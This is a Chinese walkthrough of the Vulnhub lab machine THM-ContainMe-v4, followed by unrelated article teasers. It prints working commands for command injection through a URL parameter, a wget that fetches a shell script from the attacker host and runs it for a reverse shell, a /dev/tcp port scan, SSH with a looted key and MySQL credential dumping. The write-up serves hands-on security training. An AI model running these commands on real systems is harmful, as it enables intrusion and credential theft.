Vulnhub系列靶机-THM-ContainMe-v4

news2024/11/15 10:22:33

文章目录

  • Vulnhub系列靶机-THM-ContainMe-v4
    • 1. 信息收集
      • 1.1 主机扫描
      • 1.2 端口扫描
      • 1.3 目录爆破
    • 2. 漏洞探测
    • 3. 漏洞利用
    • 4. 权限提升

Vulnhub系列靶机-THM-ContainMe-v4

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230914193058508

1.2 端口扫描

nmap -A -p- 192.168.188.188

image-20230914193919146

端口扫描出来了:22,80,2222,8022。

访问Web页面

image-20230914194022222

查看发现没有什么有用的信息。

1.3 目录爆破

dirsearch -u http://192.168.188.188 -e * -i 200

image-20230914194447048

扫描出来四个目录,挨个查看一下。

查看info.php页面。

image-20230914194550730

index.php页面。

image-20230914194617568

查看index.php的页面源代码。

image-20230914194858269

2. 漏洞探测

使用工具wfuzz测试

wfuzz -u "http://192.168.188.188/index.php?FUZZ=aaa" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 329

wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。

使用wfuzz进行Web应用扫描的基本步骤如下:

  1. 确定目标URL或IP地址。
  2. 构建字典文件或下载现成的字典文件。
  3. 运行wfuzz并指定扫描参数,如目标URL、字典文件等。
  4. 分析扫描结果,识别存在的漏洞和安全问题。
  5. 根据扫描结果进行修复和加固。

命令解析

  • wfuzz:命令行中执行wfuzz工具。
  • -u "http://192.168.188.188/index.php?FUZZ=aaa":指定了目标URL。FUZZ是一个占位符,wfuzz将使用字典中的每个词替换它,aaa是初始的替换值。这个命令将测试以http://192.168.188.188/index.php?FUZZ=<word>形式的URL。
  • -w /usr/share/seclists/Discovery/Web-Content/common.txt:设置字典文件的路径。这里使用了/usr/share/seclists/Discovery/Web-Content/common.txt作为字典文件。该字典文件包含了一些常见的Web路径和文件名。
  • --hh 329:提示wfuzz在响应正文中寻找特定的字符串。329是用于匹配的字符串,如果找到它,wfuzz会将该响应认为是有效的。

详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。具体来说,它会将字典中的每个词替换掉占位符FUZZ,然后发送请求。如果响应中包含字符串329,那么wfuzz会将其认为是一个有效的响应。

image-20230914200134308

检测到了path参数,将其拼接在路径后面并添加参数进行测试。

image-20230914200926580

发现我们拼接的参数执行了,试着查看etc下的passwd文件。

http://192.168.188.188/index.php?path=/;cat%20/etc/passwd

image-20230914201100591

命令执行漏洞。

3. 漏洞利用

既然命令可以执行,那么我们尝试写入shell脚本。

image-20230914205215642

kali中开启http服务

python3 -m http.server 1234

image-20230914203200296

然后浏览器访问路径。

注意:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。

http://192.168.188.188/index.php?path=aaa;wget%20-P%20/tmp%20http://192.168.188.157:1234/shell.sh

查看我们的shell文件是否写入

http://192.168.188.188/index.php?path=aaa;ls%20-al%20/tmp

image-20230914203355507

文件写入成功。

执行该脚本文件,首先在kali中监听9999端口

image-20230914205312958

然后执行脚本文件

http://192.168.188.188/index.php?path=aaa;bash%20/tmp/shell.sh

image-20230914205249186

反弹成功

image-20230914205240176

之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。

image-20230914205709982

发现一个1cryptup文件,尝试执行。

./1cryptupx

image-20230914205810095

但是现在所看到的用户权限太低了,进行提权。

4. 权限提升

使用find命令进行提权

find / -perm -4000 2>/dev/null

发现了/usr/share/man/zh_TW/crypt

image-20230914210044422

进入到指定的目录,然后执行相应的文件。

image-20230914211440094

执行后发现已经是root权限了,但是Id依然显示的是www-data用户。但是这是一个残废的shell。

使用python3来获取完整的终端环境

python3 -c 'import pty;pty.spawn("/bin/bash")'

命令解析:

  • python3 -c:这是在命令行中运行 Python 3 解释器,并通过 -c 选项提供即时执行 Python 代码的能力。
  • 'import pty;pty.spawn("/bin/bash")':这是传递给 Python 解释器的代码字符串。它导入了 pty 模块并调用 spawn() 函数来创建一个伪终端并执行 /bin/bash 命令。
    • import pty:这是导入 pty 模块,pty 是一个用于处理伪终端(pseudo-terminal)的模块,它提供了一种在程序中控制终端会话的方法。
    • pty.spawn("/bin/bash"):这是调用 spawn() 函数来创建一个伪终端并执行 /bin/bash 命令。
    • spawn():该函数接受一个要执行的命令作为参数,并将当前程序的标准输入、输出以及错误连接到创建的伪终端。这样做可以实现交互式的终端会话,允许用户与 /bin/bash 命令进行交互,就像在终端中直接执行一样。

image-20230914215245104

查看网络接口

ifconfig

image-20230914210403413

发现我们在docker容器内。

扫描接口是否还有其他主机

for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5 >/dev/null && echo "172.16.20.$i" &) ;done

命令解析:

  • Bash 命令,用于对 IP 地址范围进行 Ping 测试,并将能够成功 Ping 通的 IP 地址打印出来。

image-20230914215815898

发现了172.16.20.2和172.16.20.6两个IP地址。

扫描还有哪些端口

for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open

命令解析:

  • 该命令用于扫描指定 IP 地址上的所有端口,并输出开放的端口号。
  • /dev/tcp/172.16.20.6/$port 是特殊的路径,它允许 Bash 通过创建一个与指定 IP 地址和端口相关联的文件描述符来模拟与该主机的 TCP 连接。

image-20230914215837869

发现仅开启了一个22端口。

但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。

image-20230914215901485

id_rsa是私钥文件的名称。

ssh除了密码登录,尝试利用mike用户的密钥登录

ssh mike@172.16.20.6 -i id_rsa        #-i 指定连接文件

这个命令用于通过SSH协议连接到远程主机。解析:

  • ssh:在命令行中执行SSH客户端工具。
  • mike@172.16.20.6:指定要连接的远程主机的用户名和IP地址。mike是用户名,172.16.20.6是目标主机的IP地址。
  • -i id_rsa:使用指定的私钥文件进行身份验证。id_rsa是私钥文件的名称。

连接成功

image-20230914215954122

检查一下有哪些服务是开启着的

ss -ntlp

说明:ss -ntlp 是一个 Linux 命令,用于列出当前系统上所有处于监听状态的 TCP 端口和相应的进程信息。

image-20230914220039027

mysql的3306端口是开放的。

使用弱密码password登录。

image-20230914221020911

连接成功。

image-20230914221141670

获取用户名和密码

image-20230914221210824

root bjsig4868fgjjeog
mike WhatAreYouDoingHere

退出mysql,切换为root用户

image-20230914221414673

进入到root目录下发现有个压缩文件

image-20230914221449813

利用unzip解压,解压完成后发现flag在里头

image-20230914221810078

image-20230914221744350

通关成功!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1014231.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python 扩展后的赋值运算符

视频版教程 Python3零基础7天入门实战视频教程 以下&#xff0c;假设变量a为10&#xff0c;变量c为21&#xff1a; 实例代码&#xff1a; c a print("ca c", c)c - a print("c-a c", c)c * a print("c*a c", c)c / a print("c/a c"…

【Java基础夯实】枚举类回炉重造

&#x1f9d1;‍&#x1f4bb;作者名称&#xff1a;DaenCode &#x1f3a4;作者简介&#xff1a;啥技术都喜欢捣鼓捣鼓&#xff0c;喜欢分享技术、经验、生活。 &#x1f60e;人生感悟&#xff1a;尝尽人生百味&#xff0c;方知世间冷暖。 &#x1f4d6;所属专栏&#xff1a;Ja…

如何开发你的第一个Vue.js插件:完整指南

&#x1f337;&#x1f341; 博主猫头虎&#xff08;&#x1f405;&#x1f43e;&#xff09;带您 Go to New World✨&#x1f341; &#x1f984; 博客首页——&#x1f405;&#x1f43e;猫头虎的博客&#x1f390; &#x1f433; 《面试题大全专栏》 &#x1f995; 文章图文…

思科路由器:NAT的基础配置

一直以来&#xff0c;对于华为、H3C、锐捷交换机的命令配置&#xff0c;不断的有朋友留言&#xff0c;三家交换机的配置命令容易弄混&#xff0c;经常在实际项目配置中出错&#xff0c;因此&#xff0c;找几个基础的示例来练练。 R1配置 Router>en Router>enable Rout…

STM32单片机——串口通信(轮询+中断)

STM32单片机——串口通信&#xff08;轮询中断&#xff09; 串口通信相关概念HAL库解析及CubeMX工程配置与程序设计常用函数介绍CubeMX工程配置HAL库程序设计&#xff08;轮询中断&#xff09;轮询数据收发中断收发数据 固件库程序设计及实现固件库配置流程结构体配置及初始化程…

Python 基础知识结构

一、关键字 二、内置函数 三、运算符 1、算数运算符 加 数字与字符串拼接 - 减 * 乘 数字与字符串重复 / 除 返回浮点数 % 取模 返回除法的余数 奇偶判断 ** 幂次 // 整除 返回商的整数部分&#xff0c;向下取整数&#xff0c;注意&#xff1a;-10//3,出现负数时的情况只要参…

Java反序列化和php反序列化的区别

文章目录 PHP反序列化漏洞反序列化漏洞什么是反序列化漏洞&#xff1f;修改序列化后的数据&#xff0c;目的是什么&#xff1f; Java反序列化漏洞反序列化漏洞 PHP反序列化漏洞 序列化存在的意义是为了传输数据/对象&#xff0c;类是无法直接进行传输的。通过序列化后转换为字…

Middleware ❀ Hadoop功能与使用详解(HDFS+YARN)

文章目录 1、服务概述1.1 HDFS1.1.1 架构解析1.1.1.1 Block 数据块1.1.1.2 NameNode 名称节点1.1.1.3 Secondary NameNode 第二名称节点1.1.1.4 DataNode 数据节点1.1.1.5 Block Caching 块缓存1.1.1.6 HDFS Federation 联邦1.1.1.7 Rack Awareness 机架感知 1.1.2 读写操作与可…

C++深度优化——cacheline测试

cacheline是内存调度的基本结构&#xff0c;其大小一般为32B或者64B。关于本机具体的配置信息可以在配置文件中看到&#xff1a; 这里可以看到我的这台机器的cacheline大小是64B。对于cacheline在多核处理器中有一个伪共享的状态&#xff0c;具体可以参考以下博客&#xff1a;高…

正则表达式 - 语法

目录 正则表达式 - 语法 普通字符 测试工具 非打印字符 特殊字符 限定符 定位符 选择 以下列出 ?、?<、?!、? 反向引用 实例 实例 正则表达式 - 语法 正则表达式是一种用于匹配和操作文本的强大工具&#xff0c;它是由一系列字符和特殊字符组成的模式&#…

Python绘图系统19:添加时间轴以实现动态绘图

文章目录 时间轴单帧跳转源代码 Python绘图系统&#xff1a; &#x1f4c8;从0开始的3D绘图系统&#x1f4c9;一套3D坐标&#xff0c;多个函数&#x1f4ca;散点图、极坐标和子图自定义控件&#xff1a;绘图风格&#x1f4c9;风格控件&#x1f4ca;定制绘图风格坐标设置进阶&a…

深入理解Docker容器化技术:从入门到精通

&#x1f482; 个人网站:【工具大全】【游戏大全】【神级源码资源网】&#x1f91f; 前端学习课程&#xff1a;&#x1f449;【28个案例趣学前端】【400个JS面试题】&#x1f485; 寻找学习交流、摸鱼划水的小伙伴&#xff0c;请点击【摸鱼学习交流群】 Docker已经成为了现代应…

Windows开机密码破解

Windows11以及Windows10(21H2)以上版本 先开机&#xff0c;不进行任何操作&#xff0c;静静的等待登录界面 按住Shift重启 进入“选择一个选项”界面&#xff0c;点击疑难解答 点击高级选项 点击命令提示符 输入两行命令 copy C:\windows\system32\uti1man.exe C: \Window…

苹果电脑Mac系统运行速度又卡又慢是怎么回事?

通常大家处理Mac运行速度慢的方法不是重启就是清空废纸篓&#xff0c;但是这两种方法对于Mac提速性能的效果是微之甚微的&#xff0c;想要彻底解决Mac运行速度慢&#xff0c;你应该试试一下三种方法~ 1、清理磁盘空间 硬盘空间过少是Mac运行变慢很大的一个因素&#xff0c;各…

分享一个uniapp+springboot基于微信小程序的线上维修预约系统 在线维修小程序源码 lw 调试

&#x1f495;&#x1f495;作者&#xff1a;计算机源码社 &#x1f495;&#x1f495;个人简介&#xff1a;本人七年开发经验&#xff0c;擅长Java、Python、PHP、.NET、微信小程序、爬虫、大数据等&#xff0c;大家有这一块的问题可以一起交流&#xff01; &#x1f495;&…

八股文学习三(jvm+线程池+锁)

1. jvm (1)概念 JVM是可运行 Java 代码的假想计算机 &#xff0c;包括一套字节码指令集、一组寄存器、一个栈、一个垃圾回收&#xff0c;堆 和 一个存储方法域。JVM 是运行在操作系统之上的&#xff0c;它与硬件没有直接的交互。 java运行过程&#xff1a; 我们都知道 Java…

ELK 企业级日志分析系统 ELFK

目录 一、概述 二、组件介绍 2.1、ElasticSearch 2.2、Kiabana 2.3、Logstash 2.4、可以添加的其它组件&#xff1a;Filebeat 2.5、缓存/消息队列&#xff08;redis、kafka、RabbitMQ等&#xff09; 2.6、Fluentd 三、ELK工作原理 四、实例演示 1.ELK之 部署"E&q…

【Git】万字git与gitHub

&#x1f384;欢迎来到边境矢梦的csdn博文&#x1f384; &#x1f384;本文主要梳理在git和GitHub时的笔记与感言 &#x1f384; &#x1f308;我是边境矢梦&#xff0c;一个正在为秋招和算法竞赛做准备的学生&#x1f308; &#x1f386;喜欢的朋友可以关注一下&#x1faf0;&…

接入日志收集平台前需恶补的必备知识

作者 观测云 产品服务部 技术经理 赵刚 一 前言 日志是系统中的重要数据来源之一&#xff0c;包含了丰富的信息&#xff0c;可以帮助我们更好地了解系统的运行状况和问题。本指南参照观测云文档&#xff08;https://docs.guance.com/&#xff0c;以下简称官网文档&#xff09…

【Spring Boot系列】- Spring Boot侦听器Listener

【Spring Boot系列】- Spring Boot侦听器Listener 文章目录 【Spring Boot系列】- Spring Boot侦听器Listener一、概述二、监听器Listener分类2.1 监听ServletContext的事件监听器2.2 监听HttpSeesion的事件监听器2.3 监听ServletRequest的事件监听器 三、SpringMVC中的监听器3…